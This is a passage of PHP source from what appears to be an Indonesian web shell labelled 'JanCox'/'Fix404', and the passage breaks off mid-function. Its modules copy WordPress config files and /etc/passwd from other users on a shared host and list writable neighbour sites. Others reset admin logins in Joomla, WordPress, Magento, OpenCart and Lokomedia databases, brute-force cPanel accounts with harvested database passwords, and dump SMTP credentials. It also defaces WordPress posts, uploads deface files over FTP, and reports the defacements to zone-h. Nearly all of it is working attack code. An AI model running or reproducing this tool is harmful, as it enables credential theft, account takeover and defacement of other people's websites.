2897.                     "/home3/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
2898.                     "/home3/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
2899.                     "/home3/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
2900.                     "/home3/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
2901.                     "/home3/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
2902.                     "/home3/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
2903.                     "/home3/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
2904.                     "/home3/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
2905.                     "/home3/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
2906.                     "/home3/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
2907.                     "/home3/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal"                   
2908.                         ); 
2909.                     foreach($grab_config as $config => $nama_config) {
2910.                         $ambil_config = file_get_contents($config);
2911.                         if($ambil_config == '') {
2912.                         } else {
2913.                             $file_config = fopen("cox_config/$user_cox-$nama_config.txt","w");
2914.                             fputs($file_config,$ambil_config);
2915.                         }
2916.                     }
2917.                 }      
2918.             }
2919.             echo "<center><a href='?dir=$dir/cox_config'><font color=aqua>Done</font></a></center>";
2920.             }else{
2921.                
2922.         echo "<form method=\"post\" action=\"\"><center>etc/passw ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
2923.         echo file_get_contents('/etc/passwd');
2924.         echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
2925.         }
2926. } elseif($_GET['do'] == 'jumping') {
2927.     $i = 0;
2928.     echo "<pre><div class='margin: 5px auto;'>";
2929.     $etc = fopen("/etc/passwd", "r");
2930.     while($passwd = fgets($etc)) {
2931.         if($passwd == '' || !$etc) {
2932.             echo "<font color=white>Can't read /etc/passwd</font>";
2933.         } else {
2934.             preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
2935.             foreach($user_jumping[1] as $user_idx_jump) {
2936.                 $user_jumping_dir = "/home/$user_idx_jump/public_html";
2937.                 if(is_readable($user_jumping_dir)) {
2938.                     $i++;
2939.                     $jrw = "[<font color=aqua>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
2940.                     if(is_writable($user_jumping_dir)) {
2941.                         $jrw = "[<font color=aqua>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
2942.                     }
2943.                     echo $jrw;
2944.                     $domain_jump = file_get_contents("/etc/named.conf");   
2945.                     if($domain_jump == '') {
2946.                         echo " => ( <font color=white>gabisa ambil nama domain nya</font> )<br>";
2947.                     } else {
2948.                         preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
2949.                         foreach($domains_jump[1] as $dj) {
2950.                             $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
2951.                             $user_jumping_url = $user_jumping_url['name'];
2952.                             if($user_jumping_url == $user_idx_jump) {
2953.                                 echo " => ( <u>$dj</u> )<br>";
2954.                                 break;
2955.                             }
2956.                         }
2957.                     }
2958.                 }
2959.             }
2960.         }
2961.     }
2962.     if($i == 0) {
2963.     } else {
2964.         echo "<br>Total ada ".$i." Kimcil di ".gethostbyname($_SERVER['HTTP_HOST'])."";
2965.     }
2966.     echo "</div></pre>";
2967. } elseif($_GET['do'] == 'auto_edit_user') {
2968.     if($_POST['hajar']) {
2969.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
2970.             echo "username atau password harus lebih dari 6 karakter";
2971.         } else {
2972.             $user_baru = $_POST['user_baru'];
2973.             $pass_baru = md5($_POST['pass_baru']);
2974.             $conf = $_POST['config_dir'];
2975.             $scan_conf = scandir($conf);
2976.             foreach($scan_conf as $file_conf) {
2977.                 if(!is_file("$conf/$file_conf")) continue;
2978.                 $config = file_get_contents("$conf/$file_conf");
2979.                 if(preg_match("/JConfig|joomla/",$config)) {
2980.                     $dbhost = ambilkata($config,"host = '","'");
2981.                     $dbuser = ambilkata($config,"user = '","'");
2982.                     $dbpass = ambilkata($config,"password = '","'");
2983.                     $dbname = ambilkata($config,"db = '","'");
2984.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
2985.                     $prefix = $dbprefix."users";
2986.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2987.                     $db = mysql_select_db($dbname);
2988.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2989.                     $result = mysql_fetch_array($q);
2990.                     $id = $result['id'];
2991.                     $site = ambilkata($config,"sitename = '","'");
2992.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
2993.                     echo "Config => ".$file_conf."<br>";
2994.                     echo "CMS => Joomla<br>";
2995.                     if($site == '') {
2996.                         echo "Sitename => <font color=white>error, gabisa ambil nama domain nya</font><br>";
2997.                     } else {
2998.                         echo "Sitename => $site<br>";
2999.                     }
3000.                     if(!$update OR !$conn OR !$db) {
3001.                         echo "Status => <font color=white>".mysql_error()."</font><br><br>";
3002.                     } else {
3003.                         echo "Status => <font color=aqua>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
3004.                     }
3005.                     mysql_close($conn);
3006.                 } elseif(preg_match("/WordPress/",$config)) {
3007.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
3008.                     $dbuser = ambilkata($config,"DB_USER', '","'");
3009.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
3010.                     $dbname = ambilkata($config,"DB_NAME', '","'");
3011.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
3012.                     $prefix = $dbprefix."users";
3013.                     $option = $dbprefix."options";
3014.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3015.                     $db = mysql_select_db($dbname);
3016.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
3017.                     $result = mysql_fetch_array($q);
3018.                     $id = $result[ID];
3019.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
3020.                     $result2 = mysql_fetch_array($q2);
3021.                     $target = $result2[option_value];
3022.                     if($target == '') {
3023.                         $url_target = "Login => <font color=white>error, gabisa ambil nama domain nyaa</font><br>";
3024.                     } else {
3025.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
3026.                     }
3027.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
3028.                     echo "Config => ".$file_conf."<br>";
3029.                     echo "CMS => Wordpress<br>";
3030.                     echo $url_target;
3031.                     if(!$update OR !$conn OR !$db) {
3032.                         echo "Status => <font color=white>".mysql_error()."</font><br><br>";
3033.                     } else {
3034.                         echo "Status => <font color=aqua>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
3035.                     }
3036.                     mysql_close($conn);
3037.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
3038.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
3039.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
3040.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
3041.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
3042.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
3043.                     $prefix = $dbprefix."admin_user";
3044.                     $option = $dbprefix."core_config_data";
3045.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3046.                     $db = mysql_select_db($dbname);
3047.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
3048.                     $result = mysql_fetch_array($q);
3049.                     $id = $result[user_id];
3050.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
3051.                     $result2 = mysql_fetch_array($q2);
3052.                     $target = $result2[value];
3053.                     if($target == '') {
3054.                         $url_target = "Login => <font color=white>error, gabisa ambil nama domain nyaa</font><br>";
3055.                     } else {
3056.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
3057.                     }
3058.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
3059.                     echo "Config => ".$file_conf."<br>";
3060.                     echo "CMS => Magento<br>";
3061.                     echo $url_target;
3062.                     if(!$update OR !$conn OR !$db) {
3063.                         echo "Status => <font color=white>".mysql_error()."</font><br><br>";
3064.                     } else {
3065.                         echo "Status => <font color=aqua>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
3066.                     }
3067.                     mysql_close($conn);
3068.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
3069.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
3070.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
3071.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
3072.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
3073.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
3074.                     $prefix = $dbprefix."user";
3075.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3076.                     $db = mysql_select_db($dbname);
3077.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
3078.                     $result = mysql_fetch_array($q);
3079.                     $id = $result[user_id];
3080.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
3081.                     if($target == '') {
3082.                         $url_target = "Login => <font color=white>error, gabisa ambil nama domain nyaa</font><br>";
3083.                     } else {
3084.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
3085.                     }
3086.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
3087.                     echo "Config => ".$file_conf."<br>";
3088.                     echo "CMS => OpenCart<br>";
3089.                     echo $url_target;
3090.                     if(!$update OR !$conn OR !$db) {
3091.                         echo "Status => <font color=white>".mysql_error()."</font><br><br>";
3092.                     } else {
3093.                         echo "Status => <font color=aqua>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
3094.                     }
3095.                     mysql_close($conn);
3096.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
3097.                     $dbhost = ambilkata($config,'server = "','"');
3098.                     $dbuser = ambilkata($config,'username = "','"');
3099.                     $dbpass = ambilkata($config,'password = "','"');
3100.                     $dbname = ambilkata($config,'database = "','"');
3101.                     $prefix = "users";
3102.                     $option = "identitas";
3103.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3104.                     $db = mysql_select_db($dbname);
3105.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
3106.                     $result = mysql_fetch_array($q);
3107.                     $target = $result[alamat_website];
3108.                     if($target == '') {
3109.                         $target2 = $result[url];
3110.                         $url_target = "Login => <font color=white>error, gabisa ambil nama domain nyaa</font><br>";
3111.                         if($target2 == '') {
3112.                             $url_target2 = "Login => <font color=white>error, gabisa ambil nama domain nyaa</font><br>";
3113.                         } else {
3114.                             $cek_login3 = file_get_contents("$target2/adminweb/");
3115.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
3116.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
3117.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
3118.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
3119.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
3120.                             } else {
3121.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=white>gatau admin login nya dimana :p</font> ]<br>";
3122.                             }
3123.                         }
3124.                     } else {
3125.                         $cek_login = file_get_contents("$target/adminweb/");
3126.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
3127.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
3128.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
3129.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
3130.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
3131.                         } else {
3132.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=white>gatau admin login nya dimana :p</font> ]<br>";
3133.                         }
3134.                     }
3135.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
3136.                     echo "Config => ".$file_conf."<br>";
3137.                     echo "CMS => Lokomedia<br>";
3138.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
3139.                         echo $url_target2;
3140.                     } else {
3141.                         echo $url_target;
3142.                     }
3143.                     if(!$update OR !$conn OR !$db) {
3144.                         echo "Status => <font color=white>".mysql_error()."</font><br><br>";
3145.                     } else {
3146.                         echo "Status => <font color=aqua>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
3147.                     }
3148.                     mysql_close($conn);
3149.                 }
3150.             }
3151.         }
3152.     } else {
3153.         echo "<center>
3154.         <h1>Auto Edit User Config</h1>
3155.         <form method='post'>
3156.         DIR Config: <br>
3157.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
3158.         Set User & Pass: <br>
3159.         <input type='text' name='user_baru' value='Fix404' placeholder='user_baru'><br>
3160.         <input type='text' name='pass_baru' value='Fix404' placeholder='pass_baru'><br>
3161.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
3162.         </form>
3163.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
3164.         ";
3165.     }
3166. }elseif($_GET['do'] == 'shelscan') {
3167.     echo'<center><h2>Shell Finder</h2>
3168. <form action="" method="post">
3169. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
3170. <br>
3171. <input name="scan" value="Start Scaning"  style="width: 215px;" type="submit">
3172. </form><br>';
3173. if (isset($_POST["scan"])) {  
3174. $url = $_POST['traget'];
3175. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
3176. echo "Result :<br />";
3177. $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
3178. "x.php","r99.php","lol.php","jo.php","port.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
3179. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
3180. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
3181. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
3182. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
3183. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
3184. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
3185. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
3186. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
3187. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
3188. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
3189. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
3190. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
3191. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
3192. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
3193. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
3194. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
3195. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
3196. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
3197. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
3198. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
3199. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
3200. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
3201. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","cox.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
3202. foreach ($shells as $shell){
3203. $headers = get_headers("$url$shell"); //
3204. if (eregi('200', $headers[0])) {
3205. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done :D</span><br /><br/><br/>"; //
3206. $dz = fopen('shells.txt', 'a+');
3207. $suck = "$url$shell";
3208. fwrite($dz, $suck."\n");
3209. }
3210. }
3211. echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
3212. }
3213.    
3214. }
3215.  elseif($_GET['do'] == 'cpanel') {
3216.     if($_POST['crack']) {
3217.         $usercp = explode("\r\n", $_POST['user_cp']);
3218.         $passcp = explode("\r\n", $_POST['pass_cp']);
3219.         $i = 0;
3220.         foreach($usercp as $ucp) {
3221.             foreach($passcp as $pcp) {
3222.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
3223.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
3224.                     } else {
3225.                         $_SESSION[$ucp] = "1";
3226.                         $_SESSION[$pcp] = "1";
3227.                         $i++;
3228.                         echo "username (<font color=aqua>$ucp</font>) password (<font color=aqua>$pcp</font>)<br>";
3229.                     }
3230.                 }
3231.             }
3232.         }
3233.         if($i == 0) {
3234.         } else {
3235.             echo "<br>Nemu ".$i." Cpanel by <font color=aqua>JanCox</font>";
3236.         }
3237.     } else {
3238.         echo "<center>
3239.         <form method='post'>
3240.         USER: <br>
3241.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
3242.         $_usercp = fopen("/etc/passwd","r");
3243.         while($getu = fgets($_usercp)) {
3244.             if($getu == '' || !$_usercp) {
3245.                 echo "<font color=white>Can't read /etc/passwd</font>";
3246.             } else {
3247.                 preg_match_all("/(.*?):x:/", $getu, $u);
3248.                 foreach($u[1] as $user_cp) {
3249.                         if(is_dir("/home/$user_cp/public_html")) {
3250.                             echo "$user_cp\n";
3251.                     }
3252.                 }
3253.             }
3254.         }
3255.         echo "</textarea><br>
3256.         PASS: <br>
3257.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
3258.         function cp_pass($dir) {
3259.             $pass = "";
3260.             $dira = scandir($dir);
3261.             foreach($dira as $dirb) {
3262.                 if(!is_file("$dir/$dirb")) continue;
3263.                 $ambil = file_get_contents("$dir/$dirb");
3264.                 if(preg_match("/WordPress/", $ambil)) {
3265.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
3266.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
3267.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
3268.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
3269.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
3270.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
3271.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
3272.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
3273.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
3274.                 } elseif(preg_match("/client/", $ambil)) {
3275.                     preg_match("/password=(.*)/", $ambil, $pass1);
3276.                     if(preg_match('/"/', $pass1[1])) {
3277.                         $pass1[1] = str_replace('"', "", $pass1[1]);
3278.                         $pass .= $pass1[1]."\n";
3279.                     }
3280.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
3281.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
3282.                 }
3283.             }
3284.             echo $pass;
3285.         }
3286.         $cp_pass = cp_pass($dir);
3287.         echo $cp_pass;
3288.         echo "</textarea><br>
3289.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
3290.         </form>
3291.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
3292.     }
3293. } elseif($_GET['do'] == 'smtp') {
3294.     echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
3295.     function scj($dir) {
3296.         $dira = scandir($dir);
3297.         foreach($dira as $dirb) {
3298.             if(!is_file("$dir/$dirb")) continue;
3299.             $ambil = file_get_contents("$dir/$dirb");
3300.             $ambil = str_replace("$", "", $ambil);
3301.             if(preg_match("/JConfig|joomla/", $ambil)) {
3302.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
3303.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
3304.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
3305.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
3306.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
3307.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
3308.                 echo "SMTP Host: <font color=aqua>$smtp_host</font><br>";
3309.                 echo "SMTP port: <font color=aqua>$smtp_port</font><br>";
3310.                 echo "SMTP user: <font color=aqua>$smtp_user</font><br>";
3311.                 echo "SMTP pass: <font color=aqua>$smtp_pass</font><br>";
3312.                 echo "SMTP auth: <font color=aqua>$smtp_auth</font><br>";
3313.                 echo "SMTP secure: <font color=aqua>$smtp_secure</font><br><br>";
3314.             }
3315.         }
3316.     }
3317.     $smpt_hunter = scj($dir);
3318.     echo $smpt_hunter;
3319. } elseif($_GET['do'] == 'auto_wp') {
3320.     if($_POST['hajar']) {
3321.         $title = htmlspecialchars($_POST['new_title']);
3322.         $pn_title = str_replace(" ", "-", $title);
3323.         if($_POST['cek_edit'] == "Y") {
3324.             $script = $_POST['edit_content'];
3325.         } else {
3326.             $script = $title;
3327.         }
3328.         $conf = $_POST['config_dir'];
3329.         $scan_conf = scandir($conf);
3330.         foreach($scan_conf as $file_conf) {
3331.             if(!is_file("$conf/$file_conf")) continue;
3332.             $config = file_get_contents("$conf/$file_conf");
3333.             if(preg_match("/WordPress/", $config)) {
3334.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
3335.                 $dbuser = ambilkata($config,"DB_USER', '","'");
3336.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
3337.                 $dbname = ambilkata($config,"DB_NAME', '","'");
3338.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
3339.                 $prefix = $dbprefix."posts";
3340.                 $option = $dbprefix."options";
3341.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3342.                 $db = mysql_select_db($dbname);
3343.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
3344.                 $result = mysql_fetch_array($q);
3345.                 $id = $result[ID];
3346.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
3347.                 $result2 = mysql_fetch_array($q2);
3348.                 $target = $result2[option_value];
3349.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
3350.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
3351.                 echo "<div style='margin: 5px auto;'>";
3352.                 if($target == '') {
3353.                     echo "URL: <font color=white>error, gabisa ambil nama domain nya</font> -> ";
3354.                 } else {
3355.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
3356.                 }
3357.                 if(!$update OR !$conn OR !$db) {
3358.                     echo "<font color=white>MySQL Error: ".mysql_error()."</font><br>";
3359.                 } else {
3360.                     echo "<font color=aqua>sukses di ganti.</font><br>";
3361.                 }
3362.                 echo "</div>";
3363.                 mysql_close($conn);
3364.             }
3365.         }
3366.     } else {
3367.         echo "<center>
3368.         <h1>Auto Edit Title+Content WordPress</h1>
3369.         <form method='post'>
3370.         DIR Config: <br>
3371.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
3372.         Set Title: <br>
3373.         <input type='text' name='new_title' value='Hacked By Fix404' placeholder='New Title'><br><br>
3374.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
3375.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
3376.         <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
3377.         <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
3378.         </form>
3379.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
3380.         ";
3381.     }
3382. } elseif($_GET['do'] == 'zoneh') {
3383.     if($_POST['submit']) {
3384.         $domain = explode("\r\n", $_POST['url']);
3385.         $nick =  $_POST['nick'];
3386.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
3387.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
3388.         function zoneh($url,$nick) {
3389.             $ch = curl_init("http://www.zone-h.com/notify/single");
3390.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
3391.                   curl_setopt($ch, CURLOPT_POST, true);
3392.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
3393.             return curl_exec($ch);
3394.                   curl_close($ch);
3395.         }
3396.         foreach($domain as $url) {
3397.             $zoneh = zoneh($url,$nick);
3398.             if(preg_match("/color=\"white\">OK<\/font><\/li>/i", $zoneh)) {
3399.                 echo "$url -> <font color=aqua>OK</font><br>";
3400.             } else {
3401.                 echo "$url -> <font color=white>ERROR</font><br>";
3402.             }
3403.         }
3404.     } else {
3405.         echo "<center><form method='post'>
3406.         <u>Defacer</u>: <br>
3407.         <input type='text' name='nick' size='50' value='Fix404'><br>
3408.         <u>Domains</u>: <br>
3409.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
3410.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
3411.         </form>";
3412.     }
3413.     echo "</center>";
3414. }elseif($_GET['do'] == 'cpftp_auto') {
3415.     if($_POST['crack']) {
3416.         $usercp = explode("\r\n", $_POST['user_cp']);
3417.         $passcp = explode("\r\n", $_POST['pass_cp']);
3418.         $i = 0;
3419.         foreach($usercp as $ucp) {
3420.             foreach($passcp as $pcp) {
3421.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
3422.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
3423.                     } else {
3424.                         $_SESSION[$ucp] = "1";
3425.                         $_SESSION[$pcp] = "1";
3426.                         if($ucp == '' || $pcp == '') {
3427.                             //
3428.                         } else {
3429.                             echo "[+] username (<font color=aqua>$ucp</font>) password (<font color=aqua>$pcp</font>)<br>";
3430.                             $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
3431.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
3432.                             if((!$ftp_login) || (!$ftp_conn)) {
3433.                                 echo "[+] <font color=white>Login Gagal</font><br><br>";
3434.                             } else {
3435.                                 echo "[+] <font color=aqua>Login Sukses</font><br>";
3436.                                 $fi = htmlspecialchars($_POST['file_deface']);
3437.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
3438.                                 if($deface) {
3439.                                     $i++;
3440.                                     echo "[+] <font color=aqua>Deface Sukses</font><br>";
3441.                                     if(function_exists('posix_getpwuid')) {
3442.                                         $domain_cp = file_get_contents("/etc/named.conf"); 
3443.                                         if($domain_cp == '') {
3444.                                             echo "[+] <font color=white>gabisa ambil nama domain nya</font><br><br>";
